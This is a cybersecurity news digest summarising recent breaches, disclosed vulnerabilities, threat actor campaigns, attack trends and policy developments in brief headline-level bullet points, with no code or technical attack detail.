Major Incidents or Breaches

  • Cloudflare mitigated a record-breaking 29.7 Tbps distributed denial-of-service (DDoS) attack attributed to the Aisuru botnet, which leveraged up to 4 million infected hosts and launched over 1,300 attacks in three months.
  • Marquis Software Solutions reported a data breach impacting over 74 US banks and credit unions.
  • French retailer Leroy Merlin disclosed a data breach that compromised customer personal data in France.
  • Freedom Mobile, a major Canadian wireless carrier, suffered a breach exposing customer data after attackers accessed its customer account management platform.
  • The University of Phoenix and the University of Pennsylvania confirmed data breaches linked to the exploitation of vulnerable Oracle E-Business Suite instances in a campaign attributed to the Clop ransomware group.
  • WordPress sites using the King Addons for Elementor plugin are being actively compromised via exploitation of a critical vulnerability (CVE-2025-8489), allowing attackers to create admin accounts and take over sites.

Newly Discovered Vulnerabilities

  • Critical vulnerabilities in React Server Components (RSC), tracked as CVE-2025-5518 and another CVE, allow unauthenticated remote code execution; these flaws may impact more than a third of cloud service providers.
  • The King Addons for Elementor WordPress plugin (CVE-2025-8489, CVSS 9.8) is under active attack, enabling privilege escalation to administrative permissions.
  • Microsoft silently patched a high-severity Windows LNK vulnerability that has been exploited by multiple state-backed and cybercrime groups as a zero-day since 2017. The November 2025 Patch Tuesday update addressed the issue, and Windows now displays additional LNK file properties to help identify malicious code.
  • Three critical vulnerabilities were disclosed in Picklescan, an open-source utility for scanning PyTorch models. These flaws allow malicious PyTorch models to evade scans and execute arbitrary code.
  • Chrome 143 stable release addressed 13 vulnerabilities, including a high-severity flaw in the V8 JavaScript engine.

Notable Threat Actor Activity

  • Kaspersky identified Shai Hulud 2.0, a new version of the npm worm now equipped with wiper functionality, targeting organizations in Russia, India, Brazil, China, and other countries.
  • The Water Saci threat actor has evolved its banking trojan campaign in Brazil, now using a multi-layered infection chain involving HTA files, PDFs, and propagation via WhatsApp and RelayNFC for NFC relay fraud. AI-enhanced Python variants are targeting enterprise users of banks and cryptocurrency exchanges.
  • The MuddyWater APT (linked to Iran) targeted Israeli organizations using new evasion tactics, including techniques mimicking the retro Snake mobile game.
  • The ShadyPanda group, believed to be China-based, has been using malicious Chrome and Edge browser extensions to spy on millions of users globally.
  • A malicious Rust crate was discovered targeting Web3 developer systems across Windows, macOS, and Linux, capable of OS-specific malware delivery and stealthy execution.
  • DragonForce ransomware, in collaboration with the Scattered Spider group, has expanded operations in 2025, leveraging advanced social engineering and initial access techniques.
  • Attackers are increasingly using Evilginx to steal session cookies, enabling bypass of multi-factor authentication (MFA) protections.
  • There is a rise in attackers abusing legitimate Remote Monitoring and Management (RMM) tools to gain remote control of victim systems.

Trends, Tools, or Tactics of Interest

  • The Aisuru botnet’s scale and DDoS throughput set new records, highlighting the growing potency of botnet-driven attacks.
  • Matrix Push C2, a new criminal toolkit, is abusing browser push notifications to launch social engineering attacks.
  • Use of AI tools is fueling more sophisticated cybercrime, lowering barriers for less-skilled actors and enhancing the quality of phishing and malware campaigns.
  • Attackers are increasingly targeting enterprises during off-hours, weekends, and holidays, exploiting reduced staffing and slower response times.
  • Content Delivery Networks (CDNs) remain a primary mitigation for DDoS and aggressive bot traffic, but attackers are attempting to bypass these protections.
  • Fileless attack techniques and abuse of legitimate IT tools are increasingly observed, complicating detection and response for defenders.

Regulatory or Policy Developments

  • The Arizona Attorney General has filed a lawsuit against Chinese online retailer Temu, alleging unauthorized and undisclosed access to and harvesting of user data through its mobile application.
  • CISA and partners released a new joint guide focused on the secure integration of artificial intelligence in operational technology environments.
  • Google is expanding Android’s in-call scam protection for financial applications in the US, aiming to address rising phone-based fraud.
  • Russia has blocked access to the Roblox gaming platform, citing the distribution of LGBT-related content and extremist material as justification.